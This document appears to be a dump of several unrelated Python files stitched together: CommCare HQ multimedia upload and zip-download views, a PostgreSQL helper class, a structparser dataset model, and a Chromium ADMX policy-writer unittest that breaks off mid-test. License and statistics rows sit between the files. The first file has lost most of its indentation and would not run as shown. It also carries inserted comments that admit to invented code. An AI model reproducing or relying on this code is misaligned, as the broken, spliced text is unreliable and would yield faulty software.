def process_upload(self):
if hasattr(self.uploaded_file, 'temporary_file_path') and settings.SHARED_DRIVE_CONF.temp_dir:
processing_id = uuid.uuid4().hex
path = settings.SHARED_DRIVE_CONF.get_temp_file(suffix='.upload')
shutil.move(self.uploaded_file.temporary_file_path(), path)
status = BulkMultimediaStatusCacheNfs(processing_id, path)
status.save()
else:
self.uploaded_file.file.seek(0)
saved_file = expose_cached_download(
self.uploaded_file.file.read(),
expiry=BulkMultimediaStatusCache.cache_expiry,
file_extension=file_extention_from_filename(self.uploaded_file.name),
)
processing_id = saved_file.download_id
status = BulkMultimediaStatusCache(processing_id)
status.save()
process_bulk_upload_zip.delay(processing_id, self.domain, self.app_id,
username=self.username,
share_media=self.share_media,
license_name=self.license_used,
author=self.author,
attribution_notes=self.attribution_notes)
return status.get_response()
@classmethod
def valid_mime_types(cls):
return [
'application/zip',
'application/x-zip',
'application/octet-stream',
'application/x-zip-compressed',
]
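# Note added for clarity (not part of the original module): the bulk upload flow
# validates the zip, stores it either on the shared NFS temp dir or in the
# cached-download store, and then hands the resulting processing_id to the
# process_bulk_upload_zip Celery task. The immediate response is built from
# status.get_response(); clients are presumably expected to poll
# MultimediaUploadStatusView (defined further below) with that processing_id until
# the cached status reports completion. A rough, hypothetical polling sketch
# (everything except the view name is invented):
#
#     resp = client.post(reverse(MultimediaUploadStatusView.name),
#                        {'processing_id': processing_id})
#     status = json.loads(resp.content)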
class BaseProcessFileUploadView(BaseProcessUploadedView):
media_class = None
@property
def form_path(self):
return self.request.POST.get('path', '')
@property
def original_path(self):
return self.request.POST.get('originalPath')
@property
def file_ext(self):
        _, extension = os.path.splitext(self.uploaded_file.name)
        return extension
@property
def orig_ext(self):
if self.original_path is None:
return self.file_ext
return '.{}'.format(self.original_path.split('.')[-1])
def validate_file(self, replace_diff_ext=False):
def possible_extensions(filename):
possible_type = guess_type(filename)[0]
if not possible_type:
return []
return guess_all_extensions(guess_type(filename)[0])
if not self.mime_type:
raise BadMediaFileException(_("Did not process a mime type!"))
base_type = self.mime_type.split('/')[0]
if base_type not in self.valid_base_types():
raise BadMediaFileException(
_("Not a valid %s file.")
% self.media_class.get_nice_name().lower()
)
if self.file_ext.lower() not in possible_extensions(self.form_path):
raise BadMediaFileException(
_("File {name} has an incorrect file type {ext}.").format(
name=self.uploaded_file.name,
ext=self.file_ext,
)
)
if not replace_diff_ext and self.file_ext.lower() != self.orig_ext.lower():
raise BadMediaFileException(_(
"The file type of {name} of '{ext}' does not match the "
"file type of the original media file '{orig_ext}'. To change "
"file types, please upload directly from the "
"Form Builder."
).format(
name=self.uploaded_file.name,
ext=self.file_ext.lower(),
orig_ext=self.orig_ext.lower(),
))
def process_upload(self):
self.uploaded_file.file.seek(0)
self.data = self.uploaded_file.file.read()
multimedia = self.media_class.get_by_data(self.data)
multimedia.attach_data(self.data,
original_filename=self.uploaded_file.name,
username=self.username)
multimedia.add_domain(self.domain, owner=True)
if self.share_media:
multimedia.update_or_add_license(self.domain,
type=self.license_used,
author=self.author,
attribution_notes=self.attribution_notes)
self.app.create_mapping(multimedia, self.form_path)
return {
'ref': multimedia.get_media_info(self.form_path),
}
@classmethod
def valid_base_types(cls):
raise NotImplementedError("You need to specify a list of valid base mime types!")
class ProcessImageFileUploadView(BaseProcessFileUploadView):
media_class = CommCareImage
name = "hqmedia_uploader_image"
@classmethod
def valid_base_types(cls):
return ['image']
class ProcessLogoFileUploadView(ProcessImageFileUploadView):
name = "hqmedia_uploader_logo"
@method_decorator(requires_privilege_raise404(privileges.COMMCARE_LOGO_UPLOADER))
def post(self, request, *args, **kwargs):
return super(ProcessLogoFileUploadView, self).post(request, *args, **kwargs)
@property
def form_path(self):
return ("jr://file/commcare/logo/data/%s%s"
% (self.filename, self.file_ext))
def validate_file(self, replace_diff_ext=True):
return super(ProcessLogoFileUploadView, self).validate_file(replace_diff_ext)
@property
def filename(self):
return self.kwargs.get('logo_name')
def process_upload(self):
if self.app.logo_refs is None:
self.app.logo_refs = {}
ref = super(
ProcessLogoFileUploadView, self
).process_upload()
self.app.logo_refs[self.filename] = ref['ref']
self.app.save()
return ref
class ProcessAudioFileUploadView(BaseProcessFileUploadView):
media_class = CommCareAudio
name = "hqmedia_uploader_audio"
@classmethod
def valid_base_types(cls):
return ['audio']
class ProcessVideoFileUploadView(BaseProcessFileUploadView):
media_class = CommCareVideo
name = "hqmedia_uploader_video"
@classmethod
def valid_base_types(cls):
return ['video']
class ProcessTextFileUploadView(BaseProcessFileUploadView):
media_class = CommCareMultimedia
name = "hqmedia_uploader_text"
@classmethod
def valid_base_types(cls):
return ['text']
class RemoveLogoView(BaseMultimediaView):
name = "hqmedia_remove_logo"
@property
def logo_slug(self):
if self.request.method == 'POST':
return self.request.POST.get('logo_slug')
return None
@method_decorator(requires_privilege_raise404(privileges.COMMCARE_LOGO_UPLOADER))
def post(self, *args, **kwargs):
if self.logo_slug in self.app.logo_refs:
del self.app.logo_refs[self.logo_slug]
self.app.save()
return HttpResponse()
class CheckOnProcessingFile(BaseMultimediaView):
name = "hqmedia_check_processing"
def get(self, request, *args, **kwargs):
return HttpResponse("workin on it")
def iter_media_files(media_objects):
"""
take as input the output of get_media_objects
and return an iterator of (path, data) tuples for the media files
as they should show up in the .zip
as well as a list of error messages
as a side effect of implementation,
errors will not include all error messages until the iterator is exhausted
"""
errors = []
def _media_files():
for path, media in media_objects:
try:
data, _ = media.get_display_file()
folder = path.replace(MULTIMEDIA_PREFIX, "")
if not isinstance(data, unicode):
yield os.path.join(folder), data
except NameError as e:
errors.append("%(path)s produced an ERROR: %(error)s" % {
'path': path,
'error': e,
})
return _media_files(), errors
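# Illustrative note (not part of the original module): because the error list is
# only filled in as the generator runs, callers must exhaust the iterator before
# inspecting the errors. A minimal usage sketch under that assumption:
#
#     files, errors = iter_media_files(app.get_media_objects())
#     for path, data in files:
#         zf.writestr(path, data)   # zf: a hypothetical zipfile.ZipFile
#     if errors:
#         handle(errors)            # hypothetical error handler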
def iter_app_files(app, include_multimedia_files, include_index_files, build_profile_id=None):
file_iterator = []
errors = []
if include_multimedia_files:
app.remove_unused_mappings()
languages = None
if build_profile_id is not None:
languages = app.build_profiles[build_profile_id].langs
file_iterator, errors = iter_media_files(app.get_media_objects(languages=languages))
if include_index_files:
index_files, index_file_errors = iter_index_files(app, build_profile_id=build_profile_id)
if index_file_errors:
errors.extend(index_file_errors)
file_iterator = itertools.chain(file_iterator, index_files)
return file_iterator, errors
class DownloadMultimediaZip(View, ApplicationViewMixin):
"""
    This is where the multimedia zip for an application gets generated.
    Expects domain and app_id to be present in its args.
"""
name = "download_multimedia_zip"
compress_zip = False
zip_name = 'commcare.zip'
include_multimedia_files = True
include_index_files = False
def check_before_zipping(self):
if not self.app.multimedia_map and self.include_multimedia_files:
return HttpResponse("You have no multimedia to download.")
def log_errors(self, errors):
logging.error(
"Error downloading multimedia ZIP "
"for domain %s and application %s." % (
self.domain, self.app_id)
)
return HttpResponseServerError(
"Errors were encountered while "
"retrieving media for this application.<br /> %s" % (
"<br />".join(errors))
)
def get(self, request, *args, **kwargs):
assert self.include_multimedia_files or self.include_index_files
error_response = self.check_before_zipping()
if error_response:
return error_response
message = request.GET['message'] if 'message' in request.GET else None
download = DownloadBase(message=message)
build_profile_id = None
if domain_has_privilege(request.domain, privileges.BUILD_PROFILES):
build_profile_id = request.GET.get('profile')
download.set_task(build_application_zip.delay(
include_multimedia_files=self.include_multimedia_files,
include_index_files=self.include_index_files,
app=self.app,
download_id=download.download_id,
compress_zip=self.compress_zip,
filename=self.zip_name,
build_profile_id=build_profile_id)
)
return download.get_start_response()
@method_decorator(safe_download)
def dispatch(self, request, *args, **kwargs):
return super(DownloadMultimediaZip, self).dispatch(request, *args, **kwargs)
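# Note added for clarity (not part of the original module): get() above does not
# build the archive inline -- it schedules the build_application_zip Celery task
# and immediately returns DownloadBase's "start" response, so the zip is produced
# asynchronously and tracked via download.download_id. check_before_zipping()
# short-circuits with a plain HttpResponse when there is no multimedia to bundle.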
class MultimediaUploadStatusView(View):
name = "hqmedia_upload_status"
@property
@memoized
def processing_id(self):
return self.request.POST.get('processing_id')
@method_decorator(login_required)
def dispatch(self, request, *args, **kwargs):
return super(MultimediaUploadStatusView, self).dispatch(request, *args, **kwargs)
def get(self, request, *args, **kwargs):
return HttpResponseBadRequest("Please post to this.")
def post(self, request, *args, **kwargs):
if not self.processing_id:
return HttpResponseBadRequest("A processing_id is required.")
status = BulkMultimediaStatusCache.get(self.processing_id)
if status is None:
# No status could be retrieved from the cache
fake_status = BulkMultimediaStatusCache(self.processing_id)
fake_status.complete = True
fake_status.errors.append(_('There was an issue retrieving the status from the cache. '
'We are looking into it. Please try uploading again.'))
logging.error("[Multimedia Bulk Upload] Process ID #%s encountered an issue while retrieving "
"a status from the cache." % self.processing_id)
response = fake_status.get_response()
else:
response = status.get_response()
return HttpResponse(json.dumps(response))
class ViewMultimediaFile(View):
name = "hqmedia_download"
@property
@memoized
def media_class(self):
media_type = self.kwargs.get('media_type')
try:
return CommCareMultimedia.get_doc_class(media_type)
except KeyError:
raise Http404("Could not find media of that type.")
@property
@memoized
def doc_id(self):
return self.kwargs.get('doc_id')
@property
@memoized
def multimedia(self):
try:
return self.media_class.get(self.doc_id)
except ResourceNotFound:
raise Http404("Media not found.")
@property
@memoized
def thumb(self):
thumb = self.request.GET.get('thumb')
try:
return int(thumb), int(thumb)
except Exception:
return None
def get(self, request, *args, **kwargs):
obj = CachedObject(str(self.doc_id)
+ ':' + self.kwargs.get('media_type')
+ ':' + str(self.thumb))
if not obj.is_cached():
data, content_type = self.multimedia.get_display_file()
if self.thumb:
data = CommCareImage.get_thumbnail_data(data, self.thumb)
buffer = StringIO(data)
metadata = {'content_type': content_type}
obj.cache_put(buffer, metadata, timeout=None)
else:
metadata, buffer = obj.get()
data = buffer.getvalue()
content_type = metadata['content_type']
return HttpResponse(data, content_type=content_type)
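# Note added for clarity (not part of the original module): media blobs served by
# ViewMultimediaFile are memoized in CachedObject under a
# "<doc_id>:<media_type>:<thumb>" key, so a thumbnail of a given size is generated
# once and then served from cache; timeout=None appears to mean the cached entry
# never expires on its own.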
def iter_index_files(app, build_profile_id=None):
from corehq.apps.app_manager.views.download import download_index_files
skip_files = ('profile.xml', 'profile.ccpr', 'media_profile.xml')
text_extensions = ('.xml', '.ccpr', '.txt')
files = []
errors = []
def _get_name(f):
return {'media_profile.ccpr': 'profile.ccpr'}.get(f, f)
def _encode_if_unicode(s):
return s.encode('utf-8') if isinstance(s, unicode) else s
def _files(files):
for name, f in files:
if build_profile_id is not None:
name = name.replace(build_profile_id + '/', '')
if name not in skip_files:
# TODO: make RemoteApp.create_all_files not return media files
extension = os.path.splitext(name)[1]
data = _encode_if_unicode(f) if extension in text_extensions else f
yield (_get_name(name), data)
try:
files = download_index_files(app, build_profile_id)
except Exception as e:
errors = [unicode(e)]
return _files(files), errors
| bsd-3-clause | 1,299,744,272,025,321,000 | 34.589425 | 121 | 0.627775 | false |
IntersectAustralia/asvo-tao | core/PerformanceCode/WallTimeResultsMerge.py | 1 | 2770 | import pickle, os, logging, string
import pg
import locale
import time
from datetime import date
import settingReader
class DBInterface(object):
def __init__(self,Options):
self.Options=Options
self.InitDBConnection(self.Options)
self.IsOpen=False
self.QueriesCount=0
def InitDBConnection(self,Options):
####### PostgreSQL Backend Master DB #################
self.serverip=Options['PGDB:serverip']
self.username=Options['PGDB:user']
self.password=Options['PGDB:password']
self.port=int(Options['PGDB:port'])
self.DBName=Options['PGDB:NewDBName']
self.CurrentConnection=pg.connect(host=self.serverip,user=self.username,passwd=self.password,port=self.port,dbname=self.DBName)
print('Connection to DB is open...')
self.IsOpen=True
def CloseConnections(self):
if self.IsOpen==True:
self.CurrentConnection.close()
print('Connection to DB is Closed...')
self.IsOpen=False
def ExecuteNoQuerySQLStatment(self,SQLStatment):
try:
self.CurrentConnection.query(SQLStatment)
return True
except Exception as Exp:
print(">>>>>Error While Executing Non-Query SQL Statement")
print(type(Exp))
print(Exp.args)
print(Exp)
print("Current SQL Statement =\n"+SQLStatment)
return False
def ExecuteQuerySQLStatment(self,SQLStatment):
try:
resultsList=self.CurrentConnection.query(SQLStatment).getresult()
return resultsList
except Exception as Exp:
print(">>>>>Error While Executing Query SQL Statement")
print(type(Exp))
print(Exp.args)
print(Exp)
print("Current SQL Statement =\n"+SQLStatment)
def ExecuteQuerySQLStatmentAsDict(self,SQLStatment):
try:
resultsList=self.CurrentConnection.query(SQLStatment).dictresult()
return resultsList
except Exception as Exp:
print(">>>>>Error While Executing Query SQL Statement")
print(type(Exp))
print(Exp.args)
print(Exp)
print("Current SQL Statement =\n"+SQLStatment)
if __name__ == '__main__':
[Options]=settingReader.ParseParams("settings.xml")
DBConnectionObj=DBInterface(Options)
DBConnectionObj.CloseConnections() | gpl-3.0 | 8,723,199,746,973,042,000 | 34.075949 | 135 | 0.555596 | false |
simone-campagna/py-structparser | examples/versioning/model/model_r1.py | 1 | 3830 | #
# Copyright 2013 Simone Campagna
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
__author__ = 'Simone Campagna'
from structparser.core import *
class FileTypeEnum(EnumType):
"""Enumeration for file types:
* RAW-C: C raw file
* RAW-FORTRAN: FORTRAN raw file
* ASCII: ASCII file
"""
__items__ = ('RAW-C', 'RAW-FORTRAN', 'ASCII')
class FileType(Enum):
"""wraps the FileTypeEnum enumeration"""
__type__ = FileTypeEnum
class Params(Struct):
__fields__ = (
FieldType("alpha",
field_type=Float,
description="the alpha coefficient"),
FieldType("beta",
field_type=Float,
description="the beta coefficient"),
FieldType("order",
field_type=PositiveInt,
default=1,
description="the equation order"),
FieldType("coefficients",
field_type=FloatList(BIND.order + 1),
description="the equation coefficients"),
)
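# Note added for clarity (an assumption about structparser semantics, not stated in
# this file): the BIND references above, e.g. FloatList(BIND.order + 1), appear to
# be late-bound lookups of fields parsed earlier in the same struct, so the length
# of "coefficients" is derived from the parsed value of "order" plus one.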
class ParamsSubFile(BaseSubFile):
__subtype__ = Params
class ExperimentalParams(Struct):
__fields__ = (
FieldType("gamma_0",
field_type=Float,
default=0.95,
description="gamma_0 coefficient"),
FieldType("gamma_1",
field_type=Float,
default=-0.95,
description="gamma_1 coefficient"),
FieldType("label",
field_type=Str,
default="exp-0",
description="label"),
)
class Dataset(Struct):
__fields__ = (
FieldType("version",
field_type=Str,
default="r1",
description="version number"),
FieldType("r1",
field_type=Int,
description="r1 value"),
FieldType("num_vars",
field_type=NonNegativeInt,
description="number of variables"),
FieldType("num_tsteps",
field_type=NonNegativeInt,
description="number of time steps"),
FieldType("spacing",
field_type=FloatList(3),
description="x, y, z spacing"),
FieldType("var_names",
field_type=StrList(BIND.num_vars),
description="name of the variables"),
FieldType("tsteps",
field_type=FloatList(BIND.num_tsteps),
description="value of the time steps"),
FieldType("file_type",
field_type=FileType,
default=FileTypeEnum.ASCII,
description="file type: {{{0}}}".format(', '.join(item.label for item in FileTypeEnum))),
FieldType("files",
field_type=PathList(BIND.num_vars * BIND.num_tsteps),
description="var data files"),
FieldType("mix_files",
field_type=PathList(BIND.num_vars ** 2),
description="mix var data files"),
FieldType("experimental_flag",
field_type=Switch,
description="enable experimental mode; it switches on/off the 'experimental_params' section"),
FieldType("experimental_params",
field_type=Switched(ExperimentalParams, BIND.experimental_flag),
description="experimental mode parameters; they all have a default value"),
FieldType("params_file",
field_type=ParamsSubFile,
description="parameters file"),
)
| apache-2.0 | -2,636,145,637,851,915,000 | 32.596491 | 106 | 0.597389 | false |
endlessm/chromium-browser | components/policy/tools/template_writers/writers/admx_writer_unittest.py | 3 | 25665 | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Unittests for writers.admx_writer."""
import os
import sys
import unittest
if __name__ == '__main__':
sys.path.append(os.path.join(os.path.dirname(__file__), '../../../..'))
from writers import admx_writer
from writers import xml_writer_base_unittest
from xml.dom import minidom
class AdmxWriterUnittest(xml_writer_base_unittest.XmlWriterBaseTest):
def _CreateDocumentElement(self):
dom_impl = minidom.getDOMImplementation('')
doc = dom_impl.createDocument(None, 'root', None)
return doc.documentElement
def setUp(self):
    # Writer configuration. This dictionary contains parameters used by the
    # ADMX writer.
config = {
'win_supported_os': 'SUPPORTED_TESTOS',
'win_supported_os_win7': 'SUPPORTED_TESTOS_2',
'win_config': {
'win': {
'reg_mandatory_key_name':
'Software\\Policies\\Test',
'reg_recommended_key_name':
'Software\\Policies\\Test\\Recommended',
'mandatory_category_path': ['test_category'],
'recommended_category_path': ['test_recommended_category'],
'category_path_strings': {
'test_category': 'TestCategory',
'test_recommended_category': 'TestCategory - recommended',
},
'namespace':
'ADMXWriter.Test.Namespace',
},
'chrome_os': {
'reg_mandatory_key_name':
'Software\\Policies\\CrOSTest',
'reg_recommended_key_name':
'Software\\Policies\\CrOSTest\\Recommended',
'mandatory_category_path': ['cros_test_category'],
'recommended_category_path': ['cros_test_recommended_category'],
'category_path_strings': {
'cros_test_category':
'CrOSTestCategory',
'cros_test_recommended_category':
'CrOSTestCategory - recommended',
},
'namespace':
'ADMXWriter.Test.Namespace.ChromeOS',
},
},
'admx_prefix': 'test_prefix',
'build': 'test_product',
}
self.writer = self._GetWriter(config)
self.writer.Init()
def _GetWriter(self, config):
return admx_writer.GetWriter(config)
def _GetKey(self):
return "Test"
def _GetCategory(self):
return "test_category"
def _GetCategoryRec(self):
return "test_recommended_category"
def _GetNamespace(self):
return "ADMXWriter.Test.Namespace"
def _GetPoliciesElement(self, doc):
node_list = doc.getElementsByTagName('policies')
self.assertTrue(node_list.length == 1)
return node_list.item(0)
def _GetCategoriesElement(self, doc):
node_list = doc.getElementsByTagName('categories')
self.assertTrue(node_list.length == 1)
return node_list.item(0)
def testEmpty(self):
self.writer.BeginTemplate()
self.writer.EndTemplate()
output = self.writer.GetTemplateText()
expected_output = (
'<?xml version="1.0" ?>\n'
'<policyDefinitions revision="1.0" schemaVersion="1.0">\n'
' <policyNamespaces>\n'
' <target namespace="' + self._GetNamespace() + '"'
' prefix="test_prefix"/>\n'
' <using namespace="Microsoft.Policies.Windows" prefix="windows"/>\n'
' </policyNamespaces>\n'
' <resources minRequiredRevision="1.0"/>\n'
' <supportedOn>\n'
' <definitions>\n'
' <definition displayName="'
'$(string.SUPPORTED_TESTOS)" name="SUPPORTED_TESTOS"/>\n'
' <definition displayName="'
'$(string.SUPPORTED_TESTOS_2)" name="SUPPORTED_TESTOS_2"/>\n'
' </definitions>\n'
' </supportedOn>\n'
' <categories>\n'
' <category displayName="$(string.' + self._GetCategory() + ')"'
' name="' + self._GetCategory() + '"/>\n'
' <category displayName="$(string.' + self._GetCategoryRec() + ')"'
' name="' + self._GetCategoryRec() + '"/>\n'
' </categories>\n'
' <policies/>\n'
'</policyDefinitions>')
self.AssertXMLEquals(output, expected_output)
def testEmptyVersion(self):
self.writer.config['version'] = '39.0.0.0'
self.writer.BeginTemplate()
self.writer.EndTemplate()
output = self.writer.GetTemplateText()
expected_output = (
'<?xml version="1.0" ?>\n'
'<policyDefinitions revision="1.0" schemaVersion="1.0">\n'
' <!--test_product version: 39.0.0.0-->\n'
' <policyNamespaces>\n'
' <target namespace="' + self._GetNamespace() + '"'
' prefix="test_prefix"/>\n'
' <using namespace="Microsoft.Policies.Windows" prefix="windows"/>\n'
' </policyNamespaces>\n'
' <resources minRequiredRevision="1.0"/>\n'
' <supportedOn>\n'
' <definitions>\n'
' <definition displayName="'
'$(string.SUPPORTED_TESTOS)" name="SUPPORTED_TESTOS"/>\n'
' <definition displayName="'
'$(string.SUPPORTED_TESTOS_2)" name="SUPPORTED_TESTOS_2"/>\n'
' </definitions>\n'
' </supportedOn>\n'
' <categories>\n'
' <category displayName="$(string.' + self._GetCategory() + ')"'
' name="' + self._GetCategory() + '"/>\n'
' <category displayName="$(string.' + self._GetCategoryRec() + ')"'
' name="' + self._GetCategoryRec() + '"/>\n'
' </categories>\n'
' <policies/>\n'
'</policyDefinitions>')
self.AssertXMLEquals(output, expected_output)
def testEmptyPolicyGroup(self):
empty_policy_group = {'name': 'PolicyGroup', 'policies': []}
# Initialize writer to write a policy group.
self.writer.BeginTemplate()
# Write policy group
self.writer.BeginPolicyGroup(empty_policy_group)
self.writer.EndPolicyGroup()
output = self.GetXMLOfChildren(self._GetPoliciesElement(self.writer._doc))
expected_output = ''
self.AssertXMLEquals(output, expected_output)
output = self.GetXMLOfChildren(self._GetCategoriesElement(self.writer._doc))
expected_output = (
'<category displayName="$(string.' + self._GetCategory() + ')"'
' name="' + self._GetCategory() + '"/>\n'
'<category displayName="$(string.' + self._GetCategoryRec() + ')"'
' name="' + self._GetCategoryRec() + '"/>\n'
'<category displayName="$(string.PolicyGroup_group)"'
' name="PolicyGroup">\n'
' <parentCategory ref="' + self._GetCategory() + '"/>\n'
'</category>')
self.AssertXMLEquals(output, expected_output)
def testPolicyGroup(self):
empty_policy_group = {
'name':
'PolicyGroup',
'policies': [
{
'name': 'PolicyStub2',
'type': 'main'
},
{
'name': 'PolicyStub1',
'type': 'main'
},
]
}
# Initialize writer to write a policy group.
self.writer.BeginTemplate()
# Write policy group
self.writer.BeginPolicyGroup(empty_policy_group)
self.writer.EndPolicyGroup()
output = self.GetXMLOfChildren(self._GetPoliciesElement(self.writer._doc))
expected_output = ''
self.AssertXMLEquals(output, expected_output)
output = self.GetXMLOfChildren(self._GetCategoriesElement(self.writer._doc))
expected_output = (
'<category displayName="$(string.' + self._GetCategory() + ')"'
' name="' + self._GetCategory() + '"/>\n'
'<category displayName="$(string.' + self._GetCategoryRec() + ')"'
' name="' + self._GetCategoryRec() + '"/>\n'
'<category displayName="$(string.PolicyGroup_group)"'
' name="PolicyGroup">\n'
' <parentCategory ref="' + self._GetCategory() + '"/>\n'
'</category>')
self.AssertXMLEquals(output, expected_output)
def _initWriterForPolicy(self, writer, policy):
'''Initializes the writer to write the given policy next.
'''
policy_group = {'name': 'PolicyGroup', 'policies': [policy]}
writer.BeginTemplate()
writer.BeginPolicyGroup(policy_group)
def testMainPolicy(self):
main_policy = {
'name': 'DummyMainPolicy',
'type': 'main',
}
self._initWriterForPolicy(self.writer, main_policy)
self.writer.WritePolicy(main_policy)
output = self.GetXMLOfChildren(self._GetPoliciesElement(self.writer._doc))
expected_output = (
'<policy class="' + self.writer.GetClass(main_policy) + '"'
' displayName="$(string.DummyMainPolicy)"'
' explainText="$(string.DummyMainPolicy_Explain)"'
' key="Software\\Policies\\' + self._GetKey() + '"'
' name="DummyMainPolicy"'
' presentation="$(presentation.DummyMainPolicy)"'
' valueName="DummyMainPolicy">\n'
' <parentCategory ref="PolicyGroup"/>\n'
' <supportedOn ref="SUPPORTED_TESTOS"/>\n'
' <enabledValue>\n'
' <decimal value="1"/>\n'
' </enabledValue>\n'
' <disabledValue>\n'
' <decimal value="0"/>\n'
' </disabledValue>\n'
'</policy>')
self.AssertXMLEquals(output, expected_output)
def testRecommendedPolicy(self):
main_policy = {
'name': 'DummyMainPolicy',
'type': 'main',
}
policy_group = {
'name': 'PolicyGroup',
'policies': [main_policy],
}
self.writer.BeginTemplate()
self.writer.BeginRecommendedPolicyGroup(policy_group)
self.writer.WriteRecommendedPolicy(main_policy)
output = self.GetXMLOfChildren(self._GetPoliciesElement(self.writer._doc))
expected_output = (
'<policy class="' + self.writer.GetClass(main_policy) + '"'
' displayName="$(string.DummyMainPolicy)"'
' explainText="$(string.DummyMainPolicy_Explain)"'
' key="Software\\Policies\\' + self._GetKey() + '\\Recommended"'
' name="DummyMainPolicy_recommended"'
' presentation="$(presentation.DummyMainPolicy)"'
' valueName="DummyMainPolicy">\n'
' <parentCategory ref="PolicyGroup_recommended"/>\n'
' <supportedOn ref="SUPPORTED_TESTOS"/>\n'
' <enabledValue>\n'
' <decimal value="1"/>\n'
' </enabledValue>\n'
' <disabledValue>\n'
' <decimal value="0"/>\n'
' </disabledValue>\n'
'</policy>')
self.AssertXMLEquals(output, expected_output)
def testRecommendedOnlyPolicy(self):
main_policy = {
'name': 'DummyMainPolicy',
'type': 'main',
'features': {
'can_be_recommended': True,
'can_be_mandatory': False,
}
}
policy_group = {
'name': 'PolicyGroup',
'policies': [main_policy],
}
self.writer.BeginTemplate()
self.writer.BeginRecommendedPolicyGroup(policy_group)
self.writer.WritePolicy(main_policy)
self.writer.WriteRecommendedPolicy(main_policy)
output = self.GetXMLOfChildren(self._GetPoliciesElement(self.writer._doc))
expected_output = (
'<policy class="' + self.writer.GetClass(main_policy) + '"'
' displayName="$(string.DummyMainPolicy)"'
' explainText="$(string.DummyMainPolicy_Explain)"'
' key="Software\\Policies\\' + self._GetKey() + '\\Recommended"'
' name="DummyMainPolicy_recommended"'
' presentation="$(presentation.DummyMainPolicy)"'
' valueName="DummyMainPolicy">\n'
' <parentCategory ref="PolicyGroup_recommended"/>\n'
' <supportedOn ref="SUPPORTED_TESTOS"/>\n'
' <enabledValue>\n'
' <decimal value="1"/>\n'
' </enabledValue>\n'
' <disabledValue>\n'
' <decimal value="0"/>\n'
' </disabledValue>\n'
'</policy>')
self.AssertXMLEquals(output, expected_output)
def testStringPolicy(self):
string_policy = {
'name': 'SampleStringPolicy',
'type': 'string',
}
self._initWriterForPolicy(self.writer, string_policy)
self.writer.WritePolicy(string_policy)
output = self.GetXMLOfChildren(self._GetPoliciesElement(self.writer._doc))
expected_output = (
'<policy class="' + self.writer.GetClass(string_policy) + '"'
' displayName="$(string.SampleStringPolicy)"'
' explainText="$(string.SampleStringPolicy_Explain)"'
' key="Software\\Policies\\' + self._GetKey() + '"'
' name="SampleStringPolicy"'
' presentation="$(presentation.SampleStringPolicy)">\n'
' <parentCategory ref="PolicyGroup"/>\n'
' <supportedOn ref="SUPPORTED_TESTOS"/>\n'
' <elements>\n'
' <text id="SampleStringPolicy" maxLength="1000000"'
' valueName="SampleStringPolicy"/>\n'
' </elements>\n'
'</policy>')
self.AssertXMLEquals(output, expected_output)
def testIntPolicy(self):
int_policy = {
'name': 'SampleIntPolicy',
'type': 'int',
}
self._initWriterForPolicy(self.writer, int_policy)
self.writer.WritePolicy(int_policy)
output = self.GetXMLOfChildren(self._GetPoliciesElement(self.writer._doc))
expected_output = (
'<policy class="' + self.writer.GetClass(int_policy) + '"'
' displayName="$(string.SampleIntPolicy)"'
' explainText="$(string.SampleIntPolicy_Explain)"'
' key="Software\\Policies\\' + self._GetKey() + '"'
' name="SampleIntPolicy"'
' presentation="$(presentation.SampleIntPolicy)">\n'
' <parentCategory ref="PolicyGroup"/>\n'
' <supportedOn ref="SUPPORTED_TESTOS"/>\n'
' <elements>\n'
' <decimal id="SampleIntPolicy" maxValue="2000000000" minValue="0" '
'valueName="SampleIntPolicy"/>\n'
' </elements>\n'
'</policy>')
self.AssertXMLEquals(output, expected_output)
def testIntPolicyWithWin7Only(self):
int_policy = {
'name': 'SampleIntPolicy',
'type': 'int',
'supported_on': [{
'platform': 'win7',
}]
}
self._initWriterForPolicy(self.writer, int_policy)
self.writer.WritePolicy(int_policy)
output = self.GetXMLOfChildren(self._GetPoliciesElement(self.writer._doc))
expected_output = (
'<policy class="' + self.writer.GetClass(int_policy) + '"'
' displayName="$(string.SampleIntPolicy)"'
' explainText="$(string.SampleIntPolicy_Explain)"'
' key="Software\\Policies\\' + self._GetKey() + '"'
' name="SampleIntPolicy"'
' presentation="$(presentation.SampleIntPolicy)">\n'
' <parentCategory ref="PolicyGroup"/>\n'
' <supportedOn ref="SUPPORTED_TESTOS_2"/>\n'
' <elements>\n'
' <decimal id="SampleIntPolicy" maxValue="2000000000" minValue="0" '
'valueName="SampleIntPolicy"/>\n'
' </elements>\n'
'</policy>')
self.AssertXMLEquals(output, expected_output)
def testIntEnumPolicy(self):
enum_policy = {
'name':
'SampleEnumPolicy',
'type':
'int-enum',
'items': [
{
'name': 'item_1',
'value': 0
},
{
'name': 'item_2',
'value': 1
},
]
}
self._initWriterForPolicy(self.writer, enum_policy)
self.writer.WritePolicy(enum_policy)
output = self.GetXMLOfChildren(self._GetPoliciesElement(self.writer._doc))
expected_output = (
'<policy class="' + self.writer.GetClass(enum_policy) + '"'
' displayName="$(string.SampleEnumPolicy)"'
' explainText="$(string.SampleEnumPolicy_Explain)"'
' key="Software\\Policies\\' + self._GetKey() + '"'
' name="SampleEnumPolicy"'
' presentation="$(presentation.SampleEnumPolicy)">\n'
' <parentCategory ref="PolicyGroup"/>\n'
' <supportedOn ref="SUPPORTED_TESTOS"/>\n'
' <elements>\n'
' <enum id="SampleEnumPolicy" valueName="SampleEnumPolicy">\n'
' <item displayName="$(string.SampleEnumPolicy_item_1)">\n'
' <value>\n'
' <decimal value="0"/>\n'
' </value>\n'
' </item>\n'
' <item displayName="$(string.SampleEnumPolicy_item_2)">\n'
' <value>\n'
' <decimal value="1"/>\n'
' </value>\n'
' </item>\n'
' </enum>\n'
' </elements>\n'
'</policy>')
self.AssertXMLEquals(output, expected_output)
def testStringEnumPolicy(self):
enum_policy = {
'name':
'SampleEnumPolicy',
'type':
'string-enum',
'items': [
{
'name': 'item_1',
'value': 'one'
},
{
'name': 'item_2',
'value': 'two'
},
]
}
    # This test is different from the others because it also verifies that
    # whitespace inside <string> nodes is handled correctly.
dom_impl = minidom.getDOMImplementation('')
self.writer._doc = dom_impl.createDocument(None, 'policyDefinitions', None)
